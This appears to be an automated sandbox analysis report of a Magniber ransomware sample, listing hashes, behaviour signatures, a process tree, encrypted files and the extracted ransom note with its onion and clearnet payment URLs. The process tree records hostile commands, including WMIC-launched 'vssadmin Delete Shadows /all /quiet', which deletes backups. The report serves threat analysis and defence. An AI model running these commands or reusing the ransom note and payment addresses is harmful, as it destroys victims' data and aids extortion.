Analysis

  • max time kernel
    101s
  • max time network
    167s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    22-06-2021 14:08

General

  • Target

    10.exe

  • Size

    21KB

  • MD5

    89dec4d6bfe84c184bba66cb88e9e9b1

  • SHA1

    9ef17ae9e70f9ce851a2460028da272d4828e270

  • SHA256

    2852f76a016cf31d51a7d59a77857bee6285f59c95d6bcb8cd83b83640adbb69

  • SHA512

    37f057cf49cc6e2626e6a3881898cff4d1956bfe73770f7bf35c0e2afbcd04f772eed88ea997eda74c402986d7d234f58269efe695a4a25eddfe7ded8e98a4c0

Score
10/10

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!
====================================================================================================
Your files are NOT damaged! Your files are modified only. This modification is reversible.
The only 1 way to decrypt your files is to receive the private key and decryption program.
Any attempts to restore your files with the third party software will be fatal for your files!
====================================================================================================
To receive the private key and decryption program follow the instructions below:
1. Download "Tor Browser" from https://www.torproject.org/ and install it.
2. In the "Tor Browser" open your personal page here: http://22ecca08ea784a70d8ovlamrdt.5s4ixqul2enwxrqv.onion/ovlamrdt
Note! This page is available via "Tor Browser" only.
====================================================================================================
Also you can use temporary addresses on your personal page without using "Tor Browser":
http://22ecca08ea784a70d8ovlamrdt.dayhit.xyz/ovlamrdt
http://22ecca08ea784a70d8ovlamrdt.bestep.cyou/ovlamrdt
http://22ecca08ea784a70d8ovlamrdt.ownhits.space/ovlamrdt
http://22ecca08ea784a70d8ovlamrdt.plughas.casa/ovlamrdt
Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://22ecca08ea784a70d8ovlamrdt.5s4ixqul2enwxrqv.onion/ovlamrdt

http://22ecca08ea784a70d8ovlamrdt.dayhit.xyz/ovlamrdt

http://22ecca08ea784a70d8ovlamrdt.bestep.cyou/ovlamrdt

http://22ecca08ea784a70d8ovlamrdt.ownhits.space/ovlamrdt

http://22ecca08ea784a70d8ovlamrdt.plughas.casa/ovlamrdt

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

  • Process spawned unexpected child process 9 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies extensions of user files 7 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Suspicious use of SetThreadContext 3 IoCs
  • Interacts with shadow copies 2 TTPs 4 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1200
    • C:\Users\Admin\AppData\Local\Temp\10.exe
      "C:\Users\Admin\AppData\Local\Temp\10.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1020
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1788
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
          PID:1192
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1244
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
          PID:1688
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1284
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2028
  • C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1172
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1800
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1636
  • C:\Windows\system32\taskhost.exe
    "taskhost.exe"
    1⤵
    • Modifies extensions of user files
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1104
    • C:\Windows\system32\notepad.exe
      notepad.exe C:\Users\Public\readme.txt
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:1272
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1060
    • C:\Windows\system32\cmd.exe
      cmd /c "start http://22ecca08ea784a70d8ovlamrdt.dayhit.xyz/ovlamrdt^&1^&46770499^&67^&327^&12"
      2⤵
      PID:1668
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" http://22ecca08ea784a70d8ovlamrdt.dayhit.xyz/ovlamrdt&1&46770499&67&327&12
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1900
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1900 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:2160
  • C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:932
  • C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1668
    • C:\Windows\system32\cmd.exe
      cmd /c CompMgmtLauncher.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1468
      • C:\Windows\system32\CompMgmtLauncher.exe
        CompMgmtLauncher.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2168
        • C:\Windows\system32\wbem\wmic.exe
          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
          4⤵
          PID:2472
    • C:\Windows\system32\cmd.exe
      cmd /c CompMgmtLauncher.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:516
      • C:\Windows\system32\CompMgmtLauncher.exe
        CompMgmtLauncher.exe
        3⤵
        PID:2260
        • C:\Windows\system32\wbem\wmic.exe
          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
          4⤵
          PID:2480
    • C:\Windows\system32\cmd.exe
      cmd /c CompMgmtLauncher.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2068
      • C:\Windows\system32\CompMgmtLauncher.exe
        CompMgmtLauncher.exe
        3⤵
        PID:2236
        • C:\Windows\system32\wbem\wmic.exe
          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
          4⤵
          PID:2500
    • C:\Windows\system32\cmd.exe
      cmd /c CompMgmtLauncher.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2060
      • C:\Windows\system32\CompMgmtLauncher.exe
        CompMgmtLauncher.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2212
        • C:\Windows\system32\wbem\wmic.exe
          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
          4⤵
          PID:2464
    • C:\Windows\system32\cmd.exe
      cmd /c CompMgmtLauncher.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2092
      • C:\Windows\system32\CompMgmtLauncher.exe
        CompMgmtLauncher.exe
        3⤵
        PID:2192
    • C:\Windows\system32\vssadmin.exe
      vssadmin.exe Delete Shadows /all /quiet
      2⤵
      • Process spawned unexpected child process
      • Interacts with shadow copies
      PID:2640
    • C:\Windows\system32\vssadmin.exe
      vssadmin.exe Delete Shadows /all /quiet
      2⤵
      • Process spawned unexpected child process
      • Interacts with shadow copies
      PID:2632
    • C:\Windows\system32\vssadmin.exe
      vssadmin.exe Delete Shadows /all /quiet
      2⤵
      • Process spawned unexpected child process
      • Interacts with shadow copies
      PID:2768
    • C:\Windows\system32\vssadmin.exe
      vssadmin.exe Delete Shadows /all /quiet
      2⤵
      • Process spawned unexpected child process
      • Interacts with shadow copies
      PID:2792
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    PID:2760

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\0AEYPAEF.txt

    MD5

    f755a7ff673a8a279fdb90c9a90da0ac

    SHA1

    920e524e854927b03d16bd7dff89c170536a18bd

    SHA256

    5f312c39bd8c67f05904a41f0550c01f94f058e8ae017102493d49de1325a8b7

    SHA512

    5a7442023c1a5b03a9a7e4c0eb21c29ff533b1c7868fcd7754eec0d14fc42b31e32192424a2473d8efa155b7f10114922620b03ae7599b320c08bd37d765c668

  • C:\Users\Admin\Desktop\ConvertHide.crw.ovlamrdt

    MD5

    15dbf3fe7ef72a626a9b462325887efc

    SHA1

    7e575e4d60057e7a349b1d34ba8c191ded22bdb5

    SHA256

    71dcb6556c5c8b9ebf7cf8450b2a2a4ee93f73641fb0ccbea980782cb205b437

    SHA512

    8125f7a619ef89314da3d19965ceadc027f46993cbb4a767f5bc555ef22807c1eb8cbb2dcbb2d309c001f61f2f7a6318dc66541016ab87f85e7c1a8b53fee219

  • C:\Users\Admin\Desktop\ConvertToLimit.xlt.ovlamrdt

    MD5

    3a32ce326b4c56d5b805000bf67d8330

    SHA1

    01b6d7727cdfd5c06045493e8e5c46177712fbfa

    SHA256

    69ccc5b24f817616cdb3e7ad7fd22d1ee8f9fcb09494adb602beaa266d516cb2

    SHA512

    8289f89b722d7f7adaa9573a5700731f7266025726248169b755e1a93c2b3cdee16864e3c69a0623bcaa809809b17fef0f71ba63af1ac2f50b7ec65319a080d0

  • C:\Users\Admin\Desktop\MeasureLimit.vb.ovlamrdt

    MD5

    dc53f77f6df9efb4bc2aef68b6dd4f47

    SHA1

    db874ce487a01b415b86f6991ca65f788a3c5489

    SHA256

    d78fc16c57e21805ae839f70191a1ac3e07c59e742b55e26497cf5c66773fcba

    SHA512

    204c42d9d851b7e41202cdc1bcc7796af67958aebd78987c224f8fd786b86b009dbcde892c0aed3e2382593a62cea79738e1a5355feafecd47f73ec3e63a80b2

  • C:\Users\Admin\Desktop\MoveHide.wav.ovlamrdt

    MD5

    ff2a81ae4b1057971e9ec87bd3e8ce68

    SHA1

    85eeb077ec437f842d1aa257daef719b7a4eddb4

    SHA256

    969336bff439a1518e9d0e6800812c637f32cb1f46d260bd0286f2c3eb19854d

    SHA512

    7be02484daf7f5db027108aeae80ba0311db91784d1c2a4d1624f7d6fe4542b596b48c488f3339741dac2f4773a713ad0a029e5ca9dcbfc337d1f2b79e7dbd27

  • C:\Users\Admin\Desktop\NewHide.png.ovlamrdt

    MD5

    70f8d0deae2ae658b4f73de3be6078bb

    SHA1

    95ad95baade5bd24eb2e994b8915bb5b8f908df1

    SHA256

    f5fbb0391bf4667225939c83caf463c465027bcbbbc58ec2e4b810714fab8769

    SHA512

    fbac844724bf9b6d9bb2d2cc769e5b8ced6d184211e7e9c0c42c47e412e13092cd80f71454d4d5115af880149dd4a5e74f5ce52a11eae699c03294d22cfab533

  • C:\Users\Admin\Desktop\StartComplete.asp.ovlamrdt

    MD5

    7cc8e8f4bbea483a97d459cc0ac2a5d1

    SHA1

    50825314ab2cd26aaf57b30b3a1384530fa52a45

    SHA256

    07205dc289a85654181e1c2b0c3230c3a2dd802864c31943adcf57319c9401b0

    SHA512

    48445f323944a3298ae2a43a01b750734fe788ca54775cd7ac69a22bcd555f336782f3c68afbede1d79d0d59a0e4b372ed08181ccccf883485fee520fafbbb1a

  • C:\Users\Admin\Desktop\WritePop.ods.ovlamrdt

    MD5

    ccd7d7f0da7f4f6dcf7155408383f8ca

    SHA1

    4baa04b71cbbab2a69e378c8b2165fb3c27df9ed

    SHA256

    bb1033df7604c8f60711c817c38c26d7aacb7911926ea2fce8228a125943604d

    SHA512

    6bfc62bc17e7337f85b1a26ee32b7adb0f9e0bebb46f3d48fdb247c62403b8850a78a79a439efebc2af1709d2109e1ff3086c39cf6a1631538aa3384d632a8e0

  • C:\Users\Admin\Desktop\readme.txt

    MD5

    e7e729288a0927ce48bac40f5db3ce50

    SHA1

    2676dded61de2d4566c0ee738c380ed6bd72f198

    SHA256

    d3193a67a1a5f2f959cdb3017ea54efebac9b855825bc5795d79d60298123186

    SHA512

    fe94fafec66311f440333af1542434f1fd0a080b6bd3c97ee5aa8243ed435cdda8da89f3f2f6189f3f8c5e125ed37676db8e7a270beae3639625faa1ae0507ff

  • C:\Users\Public\readme.txt

    MD5

    e7e729288a0927ce48bac40f5db3ce50

    SHA1

    2676dded61de2d4566c0ee738c380ed6bd72f198

    SHA256

    d3193a67a1a5f2f959cdb3017ea54efebac9b855825bc5795d79d60298123186

    SHA512

    fe94fafec66311f440333af1542434f1fd0a080b6bd3c97ee5aa8243ed435cdda8da89f3f2f6189f3f8c5e125ed37676db8e7a270beae3639625faa1ae0507ff

  • memory/932-136-0x0000000000000000-mapping.dmp

  • memory/1020-92-0x0000000001D20000-0x0000000001D21000-memory.dmp

    Filesize

    4KB

  • memory/1020-61-0x00000000000F0000-0x00000000000F1000-memory.dmp

    Filesize

    4KB

  • memory/1020-88-0x0000000001CD0000-0x0000000001CD1000-memory.dmp

    Filesize

    4KB

  • memory/1020-90-0x0000000001D00000-0x0000000001D01000-memory.dmp

    Filesize

    4KB

  • memory/1020-91-0x0000000001D10000-0x0000000001D11000-memory.dmp

    Filesize

    4KB

  • memory/1020-93-0x0000000001D30000-0x0000000001D31000-memory.dmp

    Filesize

    4KB

  • memory/1020-59-0x0000000000020000-0x0000000000025000-memory.dmp

    Filesize

    20KB

  • memory/1020-87-0x0000000001CC0000-0x0000000001CC1000-memory.dmp

    Filesize

    4KB

  • memory/1020-60-0x00000000000E0000-0x00000000000E1000-memory.dmp

    Filesize

    4KB

  • memory/1020-86-0x0000000000490000-0x0000000000491000-memory.dmp

    Filesize

    4KB

  • memory/1020-62-0x0000000000100000-0x0000000000101000-memory.dmp

    Filesize

    4KB

  • memory/1020-63-0x0000000000110000-0x0000000000111000-memory.dmp

    Filesize

    4KB

  • memory/1060-133-0x0000000000000000-mapping.dmp

  • memory/1104-95-0x00000000001D0000-0x00000000001D4000-memory.dmp

    Filesize

    16KB

  • memory/1192-145-0x0000000000000000-mapping.dmp

  • memory/1244-146-0x0000000000000000-mapping.dmp

  • memory/1272-124-0x000007FEFB7B1000-0x000007FEFB7B3000-memory.dmp

    Filesize

    8KB

  • memory/1272-123-0x0000000000000000-mapping.dmp

  • memory/1284-142-0x0000000000000000-mapping.dmp

  • memory/1636-139-0x0000000000000000-mapping.dmp

  • memory/1668-132-0x0000000000000000-mapping.dmp

  • memory/1688-147-0x0000000000000000-mapping.dmp

  • memory/1788-144-0x0000000000000000-mapping.dmp

  • memory/1800-138-0x0000000000000000-mapping.dmp

  • memory/1900-140-0x0000000000000000-mapping.dmp

  • memory/2028-143-0x0000000000000000-mapping.dmp

  • memory/2160-149-0x0000000000000000-mapping.dmp

  • memory/2168-148-0x0000000000000000-mapping.dmp

  • memory/2192-150-0x0000000000000000-mapping.dmp

  • memory/2212-151-0x0000000000000000-mapping.dmp

  • memory/2236-152-0x0000000000000000-mapping.dmp

  • memory/2260-154-0x0000000000000000-mapping.dmp

  • memory/2464-160-0x0000000000000000-mapping.dmp

  • memory/2472-159-0x0000000000000000-mapping.dmp

  • memory/2480-161-0x0000000000000000-mapping.dmp

  • memory/2500-162-0x0000000000000000-mapping.dmp